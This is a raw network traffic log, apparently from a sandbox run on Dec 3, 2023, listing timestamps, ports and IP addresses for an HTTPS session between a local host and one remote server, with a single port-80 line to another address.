Dec 3, 2023 17:23:04.377455950 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377502918 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377526045 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377536058 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377566099 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377584934 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377608061 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377629042 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377669096 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377679110 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377696037 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377705097 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377718925 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377723932 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377738953 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377759933 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377803087 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377820015 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377851009 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377863884 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377881050 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377887964 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377902985 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377918005 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377933979 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377959013 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.377960920 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377981901 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.377990961 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378001928 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378026962 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378042936 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378046989 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378066063 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378074884 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378086090 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378107071 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378135920 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378139019 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378150940 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378171921 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378192902 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378200054 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378211021 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378215075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378232002 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378232002 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378245115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378287077 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378298998 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378318071 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378351927 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378355980 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378370047 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378376007 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378392935 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378415108 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378420115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378448009 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.378449917 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378475904 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.378509045 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.585279942 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.585412979 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:04.793255091 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:04.793380022 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:05.225261927 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:05.225349903 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:06.053309917 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:06.053462982 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:07.717303038 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:07.717560053 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.414555073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.414591074 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414609909 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414701939 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.414714098 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414731979 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414813042 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.414819956 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414836884 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414849997 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414967060 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.414977074 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.414989948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415008068 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415011883 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415169001 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.415178061 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415194035 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415221930 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415256023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.415261030 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415363073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.415497065 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.415508032 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.415570974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.415643930 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:08.621269941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:08.621577978 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.061269999 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.061444044 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.497737885 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.497786999 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.497808933 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.497993946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498003006 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498024940 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498035908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498101950 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498110056 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498125076 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498135090 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498246908 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498255014 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498274088 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498292923 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498296976 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498444080 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498451948 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498482943 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498516083 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498522043 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498544931 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498562098 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498605967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498620987 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498657942 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498775005 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498784065 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498863935 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498871088 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498891115 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.498955965 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.498961926 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499048948 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499056101 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499078989 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499164104 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499171972 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499270916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499279022 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499310017 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499377012 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499385118 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499478102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499486923 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499510050 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499586105 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499593973 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499689102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499696970 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499718904 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499794006 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499802113 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499900103 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.499901056 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.499960899 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500014067 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500073910 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500075102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500101089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500134945 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500145912 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500180960 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500186920 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500221968 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500252008 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500267029 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500308990 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500333071 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500439882 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500478983 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500499010 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500560999 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500601053 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500626087 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500632048 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500669003 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500693083 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500755072 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500796080 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500824928 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500830889 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500863075 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500881910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.500957012 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.500998974 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501025915 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501032114 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501070023 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501090050 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501121044 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501162052 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501185894 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501190901 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501231909 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501354933 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501399040 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501427889 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501435041 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501461029 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501482010 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501528978 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501570940 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501595020 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501600981 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501641989 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501701117 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501740932 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501765013 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501771927 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501799107 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501821995 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501858950 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501898050 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501924992 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501930952 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.501967907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.501985073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502027988 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502067089 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502094984 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502101898 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502139091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502156973 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502187014 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502227068 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502252102 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502259016 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502295017 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502314091 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502360106 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502398968 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502428055 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502434015 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502469063 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502542019 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502583981 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502604961 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502609968 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502640963 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502662897 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502716064 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502758980 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502782106 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502787113 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502825022 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502846956 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502891064 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502929926 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502954960 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.502962112 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.502994061 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503015041 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503048897 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503091097 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503123045 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503129005 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503160000 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503179073 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503211021 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503252983 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503279924 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503285885 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503319025 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503340960 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503376007 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503416061 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503448963 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503453970 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503485918 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503505945 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503549099 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503591061 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503616095 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503622055 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503659010 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503722906 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503758907 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503767967 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503784895 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503792048 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503830910 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503865004 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503925085 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503966093 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.503993988 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.503998995 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504026890 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504045963 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504089117 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504128933 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504158020 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504163980 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504204035 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504245996 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504287004 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504311085 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504317045 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504342079 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504362106 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504409075 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504452944 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504479885 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504484892 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504520893 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504543066 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.504566908 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.504626036 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:09.709320068 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:09.709398985 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:10.149270058 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:10.149348974 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:10.981268883 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:10.981355906 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:11.113452911 CET	80	49729	208.95.112.1	192.168.2.4
Dec 3, 2023 17:23:12.645301104 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:12.645535946 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:16.037276030 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:16.037431002 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003029108 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003062010 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003078938 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003176928 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003186941 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003211975 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003304958 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003310919 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003325939 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003357887 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003413916 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003418922 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003473997 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003480911 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003540039 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003546953 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003551960 CET	443	49739	162.159.130.233	192.168.2.4
Dec 3, 2023 17:23:17.003741026 CET	49739	443	192.168.2.4	162.159.130.233
Dec 3, 2023 17:23:17.003748894 CET	443	49739	162.159.130.233	192.168.2.4
